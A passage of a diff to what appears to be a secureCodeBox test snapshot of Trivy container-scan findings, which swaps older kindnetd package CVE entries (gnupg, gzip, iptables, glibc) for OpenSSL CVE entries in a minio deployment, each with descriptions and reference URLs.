i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-14855", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-14855", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://dev.gnupg.org/T4755", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://eprint.iacr.org/2020/014.pdf", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4516-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4516-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", - ], - }, - "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.9-3+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.9-3", - "packageName": "gzip", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "X.400 address type confusion in X.509 GeneralName", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "libapt-pkg5.0", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.0.6-9.2~deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3112-1", - "installedVersion": "1.0.6-9.2~deb10u1", - "packageName": "libbz2-1.0", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "bzip2 - bugfix update", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", - ], - }, - "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", - ], - }, - "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": 